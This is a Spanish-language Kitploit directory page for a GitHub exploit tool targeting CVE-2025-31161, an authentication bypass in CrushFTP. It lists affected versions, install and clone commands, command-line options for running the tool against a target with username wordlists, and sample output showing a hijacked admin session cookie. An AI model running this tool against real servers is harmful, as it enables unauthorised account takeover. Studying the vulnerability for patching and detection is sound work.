Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31161 — # Herramienta de explotación CrushFTP CVE-2025-31161 🔓 | Kitploit
Herramientas/GitHubGitHub/tx-one/cve-2025-31161
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHubtx-one/cve-2025-31161

CVE-2025-31161

# Herramienta de explotación CrushFTP CVE-2025-31161 🔓

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Explotación CVE-2025-31161 CrushFTP 🔓

Herramienta avanzada de detección y explotación para la vulnerabilidad CVE-2025-31161 en versiones vulnerables de CrushFTP.

CVE-2025-31161 es una vulnerabilidad crítica de evasión de autenticación en la interfaz web de CrushFTP. Al manipular el encabezado de autorización HTTP, un atacante no autenticado puede obtener acceso completo bajo cualquier nombre de usuario válido sin proporcionar la contraseña correcta.

Versiones afectadas

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

Versiones Enterprise de CrushFTP anteriores a 9.3.12.5

Características principales 🚀

  • Detección automática de la versión de CrushFTP y verificación de la vulnerabilidad
  • Pruebas de credenciales multiproceso para enumeración rápida de usuarios
  • Soporte de doble método de autenticación (Bearer Token y Basic Auth)
  • Generación de informes JSON con cookies de sesión
  • Mecanismos inteligentes de reintento de conexión con configuraciones personalizadas
  • Salida de consola a color con registro detallado
  • Cobertura de versiones vulnerables:
    • 9.3.8 a 9.3.12.5
  • Requisitos 📋

    • Python 3.8+

    • Paquetes requeridos:

      root@kitploit:~
      pip install requests colorama urllib3
      

      Instalación 🛠️

    1. Instalar dependencias:
    root@kitploit:~
     pip install requests colorama urllib3
    
    1. Clonar el repositorio:
    root@kitploit:~
     git clone https://github.com/TX-One/CVE-2025-31161.git
     cd CVE-2025-31161
     python3 tx-crush.py -h
    

    Uso 🖥️

    Comando básico:

    root@kitploit:~
    python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
    

    Opciones:

    root@kitploit:~
    -h, --help            show this help message and exit
      -t, --target TARGET   Target URL (e.g., https://example.com:8080)
      -u, --users USERS     File containing username list
      -o, --output OUTPUT   Output JSON file
      -T, --threads THREADS
                            Number of threads (default: 5)
      --no-ssl              Disable SSL verification
      --timeout TIMEOUT     Request timeout (default: 15)
      --retries RETRIES     Number of retries (default: 3)
      --force               Bypass version check
    

    Ejemplo avanzado:

    root@kitploit:~
    python3 exploit.py
      -t https://vulnerable-server.com:8000
      -u ./wordlists/common_users.txt
      -o ./results/compromised.json
      -T 10
      --retries 5
      --timeout 20
    

    Ejemplo de salida 📄

    root@kitploit:~
    [
      {
        "target": "https://victim:8080",
        "user": "admin",
        "success": true,
        "method": "Bearer",
        "cookies": {"sessionID": "a1b2c3..."},
        "server_version": "CrushFTP/9.3.12"
      }
    ]
    
    root@kitploit:~
    [
      {
            "target": "http://victim:8080",
            "user": "admin",
            "success": false
        }
    ]
    

    Aviso legal: Este proyecto es solo para fines educativos y de investigación en seguridad. Se requiere un uso responsable.

    Descargar herramienta